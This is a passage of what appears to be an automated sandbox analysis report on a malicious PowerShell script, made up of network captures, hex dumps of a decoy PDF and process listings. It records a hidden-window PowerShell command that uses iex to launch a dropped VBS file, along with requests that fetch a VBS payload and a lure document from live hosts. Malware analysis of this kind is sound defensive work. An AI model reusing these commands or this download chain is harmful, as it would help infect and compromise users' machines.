                                                                                          Dec 19, 2024 12:53:37.587646008 CET1.1.1.1192.168.2.60xf403No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                                                                          HTTP Request Dependency Graph

                                                                                          • www.astenterprises.com.pk
                                                                                          • www.bluemaxxlaser.com

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.649720203.175.174.69802244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 19, 2024 12:52:48.380553007 CET80OUTGET /ms/ms.vbs HTTP/1.1
                                                                                          Host: www.bluemaxxlaser.com
                                                                                          Connection: Keep-Alive
                                                                                          Dec 19, 2024 12:52:49.913054943 CET516INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 19 Dec 2024 11:52:49 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          0192.168.2.649714107.161.23.1504432244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-12-19 11:52:45 UTC127OUTGET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                          Host: www.astenterprises.com.pk
                                                                                          Connection: Keep-Alive
                                                                                          2024-12-19 11:52:46 UTC217INHTTP/1.1 200 OK
                                                                                          Connection: close
                                                                                          content-type: application/pdf
                                                                                          last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                                          accept-ranges: bytes
                                                                                          content-length: 871324
                                                                                          date: Thu, 19 Dec 2024 11:52:45 GMT
                                                                                          server: LiteSpeed
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35
                                                                                          Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                                                          Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                                                          Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                                          Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                                          Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                                          Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                                          Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                                          Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                                          Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                                          2024-12-19 11:52:46 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                          Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:06:52:34
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\raEyjKggAf.ps1"
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:1
                                                                                          Start time:06:52:34
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:06:52:36
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ppwfy1.vbs'"
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:06:52:47
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                          Imagebase:0x7ff651090000
                                                                                          File size:5'641'176 bytes
                                                                                          MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:06:52:48
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                          Imagebase:0x7ff70df30000
                                                                                          File size:3'581'912 bytes
                                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:7
                                                                                          Start time:06:52:48
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                          Imagebase:0x7ff7403e0000
                                                                                          File size:55'320 bytes
                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:8
                                                                                          Start time:06:52:48
                                                                                          Start date:19/12/2024
                                                                                          Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1660,i,1496304434679265413,14723031609339251811,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                          Imagebase:0x7ff70df30000
                                                                                          File size:3'581'912 bytes
                                                                                          MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Executed Functions

                                                                                            Function 00007FFD3462512E Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2424889190.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd34620000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @_H
                                                                                            • API String ID: 0-518063247
                                                                                            • Opcode ID: 84af642ab3fdbc2845d4f05e3b3b2f294589634478153fb414af71696b33567e
                                                                                            • Instruction ID: 9f60d9e5bed5698f7f0875b47b7f4fe0963c9e31f5dd3c34e8b2ceb5eae18503
                                                                                            • Opcode Fuzzy Hash: 84af642ab3fdbc2845d4f05e3b3b2f294589634478153fb414af71696b33567e
                                                                                            • Instruction Fuzzy Hash: 3411E531B0D7894FEBA5DFA880B85B87BD1EF4A354F1400BEC94DDB283DA29A845C311
                                                                                            Function 00007FFD34622042 Relevance: .4, Instructions: 402COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2424889190.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd34620000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c08a2a5b7bbb4a72ce243d86d3c747a00051eafe7dd2f3a5aa0192583d003b80
                                                                                            • Instruction ID: 0bb24083f460a8c7a5e28df63a3bb16bf63dcc8554ed4df5ccf669ef23de6daa
                                                                                            • Opcode Fuzzy Hash: c08a2a5b7bbb4a72ce243d86d3c747a00051eafe7dd2f3a5aa0192583d003b80
                                                                                            • Instruction Fuzzy Hash: 1EB14832F0EA9E1FE7A99B6858A51F577D1EF86390F0805BED24EC31D3DD1DA8019242
                                                                                            Function 00007FFD346221C4 Relevance: .1, Instructions: 96COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2424889190.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd34620000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c9d5676db59d899b0c81f69abf8b1c65db7faf9c911559c5946fb24cdd83d2d8
                                                                                            • Instruction ID: 49197714a557c50ede3b6a920de6d0aaa0c01000d1e8554a47ec8b3131357b88
                                                                                            • Opcode Fuzzy Hash: c9d5676db59d899b0c81f69abf8b1c65db7faf9c911559c5946fb24cdd83d2d8
                                                                                            • Instruction Fuzzy Hash: BE21FC22F1EA5E1BE3E99F2C14B51F462C2EF96390B5805BAD24ED31D3DD1EEC416241
                                                                                            Function 00007FFD34553BB5 Relevance: .0, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2424224054.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd34550000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                            • Instruction ID: 6ef5c6aa3e0f780240857f6f5227b953c1c9b81baf09a4b5ae7509f26f333fb6
                                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                            • Instruction Fuzzy Hash: 9701843020CB0C4FD754EF0CE051AA5B7E0FB95324F10056DE58AC3661D626E882CB41
                                                                                            Function 00007FFD34622386 Relevance: .0, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2424889190.00007FFD34620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34620000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd34620000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 06c03920724274fe04f62db62e38785c7e8c31f5fc5e2e357b52bddea041b5a9
                                                                                            • Instruction ID: 9f5dab1aa39cc75ef696b6d3a3d85e6992e9bad689285b1cf8cd4d61c849121b
                                                                                            • Opcode Fuzzy Hash: 06c03920724274fe04f62db62e38785c7e8c31f5fc5e2e357b52bddea041b5a9
                                                                                            • Instruction Fuzzy Hash: 88F0AF20A0D3C55FE34A977898696A63FE1AF83750F1801EEE1CAC61B3CA681845C702

                                                                                            Non-executed Functions

                                                                                            Function 00007FFD34553CFA Relevance: .8, Instructions: 787COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2424224054.00007FFD34550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34550000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ffd34550000_powershell.jbxd
